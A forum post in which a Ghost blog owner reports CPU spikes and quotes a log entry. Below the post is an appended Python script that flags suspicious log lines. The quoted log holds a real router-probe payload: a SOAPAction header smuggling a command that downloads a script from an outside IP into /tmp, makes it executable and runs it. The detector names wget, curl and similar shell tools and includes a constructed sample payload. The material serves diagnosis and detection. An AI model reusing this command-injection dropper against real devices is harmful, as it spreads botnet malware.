Hi,
I am running Ghost on DigitalOcean with local MySQL, newest version 5.30.
The blog is small, we don’t have peaks of users.
During this week I saw several spikes to 100% CPU and the website becomes very slow or offline.
I found a strange log entry at the same time the spike starts:
{“name”:“Log”,“hostname”:“myhome”,“pid”:3807,“level”:30,“version”:“5.30.0”,“req”:{“meta”:{“requestId”:“e46ade01-7c79-4e09-883f-1e9b1f8b0283”,“userId”:null},“url”:“/HNAP1/”,“method”:“POST”,“originalUrl”:“/HNAP1/”,“params”:{},“headers”:{“x-forwarded-for”:“45.12.253.180”,“x-forwarded-proto”:“http”,“x-real-ip”:“45.12.253.180”,“host”:“137.184.48.98:80”,“connection”:“close”,“content-length”:“0”,“user-agent”:“Mozila/5.0”,“accept-encoding”:“gzip, deflate”,“accept”:“/”,“soapaction”:“"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://179.43.187.243/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"”},“query”:{}},“res”:{“_headers”:{“x-powered-by”:“Express”,“cache-control”:“public, max-age=31536000”,“location”:“https://137.184.48.98:80/HNAP1/",“vary”:"Accept, Accept-Encoding”,“content-type”:“text/plain; charset=utf-8”,“content-length”:“65”},“statusCode”:301,“responseTime”:“2ms”},“msg”:“”,“time”:“2023-01-14T23:54:45.769Z”,“v”:0}
It seems like an attack. But I really don’t understand too much.
I also use Cloudflare.
Any ideas?
Thanks in advance
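
Added example, not part of the original post: a small Python check that flags Ghost JSON log lines showing the three features visible in the entry above (a `/HNAP1/` path, shell syntax inside a header value, and a `Host` header that is a bare IP address rather than the site name). The function names, the pattern list and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import json
import re

# Shell syntax that has no place in an HTTP header value.
SHELL_META = re.compile(r"`|\$\(|&&|;\s*(?:wget|curl|chmod|sh|rm)\b")
DEVICE_PATHS = ("/HNAP1",)  # router management API, never served by a blog

def host_is_bare_ip(host):
    """True when the Host header is an IP literal, with or without a port."""
    if host.startswith("["):                      # [IPv6]:port
        name = host[1:].split("]", 1)[0]
    else:                                         # IPv4:port or name:port
        name = host.split(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(name)
    except ValueError:
        return False
    return True

def classify(line):
    """Return the reasons one JSON log line looks like an automated probe."""
    try:
        rec = json.loads(line)
    except ValueError:
        return []
    req = rec.get("req", {}) if isinstance(rec, dict) else {}
    headers = req.get("headers", {})
    reasons = []
    if req.get("url", "").startswith(DEVICE_PATHS):
        reasons.append("device-path")
    if any(SHELL_META.search(str(v)) for v in headers.values()):
        reasons.append("shell-in-header")
    if host_is_bare_ip(headers.get("host", "")):
        reasons.append("host-is-ip")              # addressed by IP, not site name
    return reasons

def _rec(url, **headers):                         # builds a constructed log line
    return json.dumps({"req": {"url": url, "headers": headers}})

# Constructed samples; hosts and addresses are documentation values, not real.
SAMPLE = [
    _rec("/HNAP1/", host="203.0.113.7:80",
         soapaction='"http://purenetworks.com/HNAP1/`cd /tmp;wget http://192.0.2.10/x.sh`"'),
    _rec("/ghost/api/content/posts/", host="blog.example.com", accept="text/html;q=0.9"),
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or "ok")
```

Counting flagged lines per minute next to the CPU graph shows whether the spikes actually line up with this kind of traffic.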